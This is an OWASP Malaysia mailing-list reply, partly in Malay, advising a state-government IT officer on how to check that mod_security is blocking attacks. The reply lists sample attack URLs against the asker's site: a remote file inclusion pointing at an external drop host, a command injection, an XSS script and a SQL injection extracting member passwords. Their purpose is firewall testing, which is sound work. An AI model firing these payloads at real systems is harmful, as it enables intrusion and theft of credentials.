On 05/09/2010, Muzamir Mokhtar <[email protected]> wrote: > Salam, > > I have setup mod_security in my httpd. > I have use rules from owasp. > I have enable the rules and use the default ruleset. > I have enable audit log. > > Question : > 1) How do i know my mod_security is working properly?
try basic attack: http://cobaan.pahang.gov.my/index.php?page=http://www.rfi-drop-site.net/rfi.txt???????? http://cobaan.pahang.gov.my/index.php?exec=uname -a http://cobaan.pahang.gov.my/index.php?search=<script>alert(123);</script> http://cobaan.pahang.gov.my/index.php?id=-13+union+select+concat_ws%280x3a,member_id,member_first_name,member_last_name,member_login,member_password%29,2,3,4+from+members-- kalau installation anda berjaya, anda akan mendapat error 403 :) > 2) Is there any additional modification i need to do in order to block > the vulnerable attack such as sql injection, xss, spam comment and > others. as you mentioned, rules from owasp has been used :) so dah tak perlu modify apa2 untuk sql injection, RFI, remote command injection, xss. but for spam comment, letak la captcha, hensem kot :) P/S: koi orang pahang jugak! :P > > Please do advice me on this. > > -- > Muzamir bin Mokhtar, > Pegawai Teknologi Maklumat (F44) > Unit Operasi > Bahagian Teknologi Maklumat > Pej SUK Pahang > TEL : 095129424/425 > FAX : 095163490 > http://muzzoshah.blogspot.com > http://muzzotechspot.blogspot.com > > > ---------------------------------------------------------------- > DISCLAIMER: > This e-mail and the attachment is from State Government of Pahang, > Malaysia. It is intended solely for the person to whom they are > addressed and may be confidential and privileged. If you are not the > intended recipient, you are notified that disclosing, distributing, > copying or taking any action in reliance of the content of this > information is strictly prohibited. Please notify the sender > immediately if you have received this e-mail and delete it from your > system. The recipient should check the e-mail and any attachment for > the presence of viruses that could be transmitted via e-mail. Email > transmission cannot be guaranteed to be secure or error free as > information could be intercepted, corrupted, lost, destroyed, > incomplete or contain viruses. State Government of Pahang, Malaysia > accepts no liability for any errors or omissions in the contents of > this message which arises as a result of e-mail transmission. > Opinions, conclusions and other information in this e-mail that does > not relate to the official business of State Government of Pahang, > Malaysia shall be understood as neither given nor endorsed by State > Government of Pahang, Malaysia. > > > -- > This message has been scanned for viruses and > dangerous content by MailScanner, and is > believed to be clean. > > _______________________________________________ > Owasp-Malaysia mailing list > [email protected] > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > > OWASP Malaysia Wiki > http://www.owasp.org/index.php/Malaysia > > OWASP Malaysia Wiki Facebook > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > _______________________________________________ Owasp-Malaysia mailing list [email protected] https://lists.owasp.org/mailman/listinfo/owasp-malaysia OWASP Malaysia Wiki http://www.owasp.org/index.php/Malaysia OWASP Malaysia Wiki Facebook http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
